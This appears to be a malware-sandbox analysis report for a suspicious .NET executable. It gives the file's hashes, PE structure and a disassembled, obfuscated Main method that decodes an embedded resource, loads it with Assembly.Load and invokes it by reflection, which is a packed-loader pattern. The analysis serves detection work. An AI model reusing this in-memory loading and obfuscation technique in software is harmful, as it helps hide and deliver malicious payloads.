Suspicious
Suspect

239dc7604cb37bd8d05228a3296312d1

PE Executable | MD5: 239dc7604cb37bd8d05228a3296312d1 | Size: 1.02 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
Hash Value
MD5
239dc7604cb37bd8d05228a3296312d1
Sha1
b45d02cf991d76968128724ed87112dc86cd2974
Sha256
7b50accfe80d370e374def391c5d57fbf8c7a468d1f20e1274e59839dafbf2db
Sha384
2178afb6ffacd9193d569c80edc130f005bb9d991ce03ef82c40c06f273cf4ae30459019a01c3d74f1c607bf5bf80077
Sha512
b94cfb6947242d2441c480c322eea1cee7c43b903b9e28a3112a35e17ccdd3a54239233067adfa816ef88c47f9c4512a8222f95eb70802c8ed48d1171e969f53
SSDeep
24576:uqRyP/DWeZ+fubP6xLN/l34KvpoJDKBKEFZ1aC+i/f:ZkDdZ+vxLF55vpZ5Px+M
TLSH
7825230817EC0799EA5E6D7FB9B62300D782F0B06907DBDFBC94AAF085C57E49602593

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ZKvq
Information
Info: PE Detect: PeReader OK (file layout)
Module Name: Pgdbejvhrbl.exe
Full Name: Pgdbejvhrbl.exe
EntryPoint: System.Void Ojyvjdz.Vuefaq::Main()
Scope Name: Pgdbejvhrbl.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Pgdbejvhrbl
Assembly Version: 1.0.6778.10827
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.6
Total Strings: 15
Main Method: System.Void Ojyvjdz.Vuefaq::Main()
Main IL Instruction Count: 189

Main IL

nop <null> ldnull <null> stloc.0 <null> br.s IL_0015: ldc.i4.1 nop <null> nop <null> call System.Byte[] Ojyvjdz.Properties.Swvvdi::get_e() stloc.0 <null> leave.s IL_001A: ldloc.0 pop <null> nop <null> nop <null> leave.s IL_0014: nop nop <null> ldc.i4.1 <null> stloc.1 <null> ldloc.1 <null> brtrue.s IL_0005: nop ldloc.0 <null> ldnull <null> cgt.un <null> stloc.2 <null> ldloc.2 <null> brfalse.s IL_0025: ldc.i4.1 ldc.i4.0 <null> br.s IL_0028: brtrue IL_01D8 ldc.i4.1 <null> br.s IL_0028: brtrue IL_01D8 brtrue IL_01D8: ret nop <null> br.s IL_0080: ldc.i4.s 95 ldloc.s V_12 ldc.i4.s 99 xor <null> stloc.s V_12 br.s IL_0056: ldc.i4.s 99 ldloc.s V_13 ldc.i4.s 96 xor <null> stloc.s V_13 ldloc.s V_13 ldc.i4.s 101 sub <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 99 call System.Int32 System.Runtime.CompilerServices.NullableAttribute::a(System.Int32) stloc.s V_13 br.s IL_0039: ldloc.s V_13 ldloc.s V_12 ldc.i4.s 93 add <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.6 <null> stloc.s V_13 br.s IL_0039: ldloc.s V_13 ldc.i4.s 95 call System.Int32 j::ad(System.Int32) stloc.s V_12 ldc.i4.7 <null> stloc.s V_13 br.s IL_0039: ldloc.s V_13 br.s IL_0030: ldloc.s V_12 ldloc.3 <null> ldlen <null> ldc.i4.0 <null> cgt.un <null> stloc.s V_4 ldc.i4.s -57 stloc.s V_12 br.s IL_0030: ldloc.s V_12 ldloc.s V_4 brfalse.s IL_00BF: ldc.i4.1 ldc.i4.s -59 stloc.s V_12 br.s IL_0030: ldloc.s V_12 ldloc.0 <null> call System.Byte[] Ojyvjdz.Vuefaq::a(System.Byte[]) stloc.3 <null> ldc.i4.s 98 call System.Int32 System.Runtime.CompilerServices.NullableAttribute::a(System.Int32) stloc.s V_12 br IL_0030: ldloc.s V_12 ldc.i4.0 <null> br.s IL_00C2: brtrue IL_01D7 ldc.i4.1 <null> br.s IL_00C2: brtrue IL_01D7 brtrue IL_01D7: nop nop <null> br.s IL_00EB: ldc.i4.s 96 ldloc.s V_11 ldc.i4.s 93 xor <null> stloc.s V_11 ldloc.s V_11 ldc.i4.s 95 sub <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 96 call System.Int32 j::ad(System.Int32) stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldloc.3 <null> call 
System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.s V_5 ldc.i4.s 61 stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldloc.s V_5 callvirt System.String System.Reflection.Assembly::get_CodeBase() call System.Boolean System.String::IsNullOrWhiteSpace(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldc.i4.s 60 stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldloc.s V_6 brfalse.s IL_012D: ldc.i4.1 ldc.i4.s 101 call System.Int32 j::ad(System.Int32) stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldc.i4.0 <null> br.s IL_0130: brtrue IL_01D6 ldc.i4.1 <null> br.s IL_0130: brtrue IL_01D6 brtrue IL_01D6: nop nop <null> br.s IL_015D: ldc.i4.s 93 ldloc.s V_10 ldc.i4.s 83 xor <null> stloc.s V_10 ldloc.s V_10 ldc.i4.s 85 add <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 93 call System.Int32 j::ad(System.Int32) stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldloc.s V_5 ldloc.s V_7 callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_8 ldc.i4.s 85 call System.Int32 j::ad(System.Int32) stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldloc.s V_8 callvirt System.String System.Type::get_FullName() call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_9 ldc.i4.s -3 stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldc.i4 16814 call System.String c::a(System.Int32) stloc.s V_7 ldc.i4.s -8 stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldloc.s V_9 brfalse.s IL_01B4: ldc.i4.1 ldc.i4.s -4 stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldc.i4.0 <null> br.s IL_01B7: brtrue.s IL_01D5 ldc.i4.1 <null> br.s IL_01B7: brtrue.s IL_01D5 brtrue.s IL_01D5: nop nop <null> ldloc.s V_8 ldc.i4 16757 call System.String c::a(System.Int32) ldc.i4 256 ldnull <null> ldnull <null> ldnull <null> callvirt System.Object System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) pop <null> nop <null> nop <null> nop <null> nop <null> ret <null>

Characteristics
No malware configuration was found at this point.